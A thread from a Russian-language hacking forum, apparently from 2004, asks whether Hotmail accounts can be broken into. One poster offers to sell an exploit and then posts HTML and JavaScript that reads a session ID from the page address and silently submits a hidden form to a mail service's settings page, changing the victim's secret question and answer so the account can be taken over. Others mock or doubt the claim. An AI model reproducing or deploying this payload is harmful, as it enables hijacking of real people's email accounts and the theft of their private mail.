Форум АНТИЧАТ - Ломается ли хотмайл?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Ломается ли хотмайл? (https://forum.antichat.xyz/showthread.php?t=2907)

Напишите пожалста, можно ли ломануть хотмайл.ком ? Или он особенный?

*** сколько можно говорить... не сломаешь ты хотмаил, если и есть спсобы то только приватные..  http://forum.antichat.ru/iB_html/non...ticons/mad.gif

Есть! Надо только головой подумать.... Кстати все написано на antichate http://forum.antichat.ru/iB_html/non...icons/turn.gif

угу и чтоже там написано? что позваляет хотмыло сломать лол

Сейчас пишу скрипт... проблема с substr. КТо шарит в js стукните мне 5895544.
За ранее... http://forum.antichat.ru/iB_html/non...cons/smile.gif

Все! 2-а дня мучений и эксплойт готов. Експлойт пока работает только с веб интерфейсом. То есть юзер должен проверять ящик именно через веб интерфейс.Работает все так что при открытие письма, выполняется js, который меняет нужные данные, и дает нам пароль.  Продам эксплойт за каких то 10$.... стучите в 5895544...
Щас работаю над тем чтобы скрипт пахал через любое почт. программу. (the bat, аутлук и тд)....

Вообщето я ни чего продавать не хотел, но просто очень ща деньги нужны http://forum.antichat.ru/iB_html/non...s/confused.gif

shine, ну не смеши ...

2чегевара: Всмысле?

интерестно как ты смог изменить нужные данные если там везде нужно указать первоночальный пароль ? http://forum.antichat.ru/iB_html/non...ns/biggrin.gif

Во-первых, я не считаю, что там есть xss, которое изменяет какие-либо параметры .. Это было бы слишком просто ...
Во-вторых, я так и непонял, что ты хотел сказать имея ввиду работу скрипта через почтовую программу ...
Я могу ошибаться, но по-моему это развод ...

Да это развод, только явно не вас. Есть 2-е формы секретный вопрос и секретный ответ... Есть форма настроек данных и есть поле маил. На все эти формы пароль не требуетсяhttp://forum.antichat.ru/iB_html/non...icons/turn.gif
Под почтовый клиент, естественно js может и не пахать(например в бате), поэтому придется крепить html'ку. Это конечно пока толька идеи, но мне кажется что ид-ешник получится вытащить из хистори(так как в почтовом клиенте больше ее вы тащить не откуда). Для особо не верущих этот код:

<html>
<script>
var stroka=location+'#';
var sid=stroka.substr(98,32);

</script>
<form   method="POST" name="forma">
   <INPUT type="hidden" name="session_id">
   <INPUT type="hidden" value="1" name="cp_msg">
   <INPUT type="hidden" value="1" name="__post">
   <INPUT type="hidden" name="cp_quest" value="Ни рыба, ни мясо?и не курица тожеhttp://forum.antichat.ru/iB_html/non...icons/turn.gif">
   <INPUT type="hidden" name="cp_answ"  value="321123">
   <INPUT type="hidden" method="POST" value="Внести изменения">
 </form>
<script>
forma.action="http://www4.nm.ru/users/chpass.dhtml...id="+sid;
forma.session_id.value=sid;
document.forma.submit()
</script>
</html>

Этот js меняет лишь секретный вопрос и ответ...
з.ы. Скрипт работает только в прикрепленном файле с именем "Ready exploit for hotmail.ru.html". Сами понимаите измените имя фаила, изменится локатион. Скрипт работает только вод веб-интерфейсом

Это так сказать тестовая версияhttp://forum.antichat.ru/iB_html/non...icons/turn.gif За полной обращайтесь в фсбhttp://forum.antichat.ru/iB_html/non...icons/turn.gif)

странно, может багу пофиксили уже, но месяц назад просто скрытым фреймом мне удалось сменить секретный вопрос и ответ на праре ящиков...

Парень лол , разговор ващето идт о hotmail.com гыгы

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'>
Бля не заметилhttp://forum.antichat.ru/iB_html/non...icons/turn.gif (Во что пиво с людьми делаетhttp://forum.antichat.ru/iB_html/non...icons/turn.gif) НУ и пох.... короче если кому експлойт под хотмеил.РУ нужон, стучитеhttp://forum.antichat.ru/iB_html/non...icons/turn.gif http://forum.antichat.ru/iB_html/non...icons/turn.gif

Тут значит разводят флейм )))Круто ))я попал на пастбище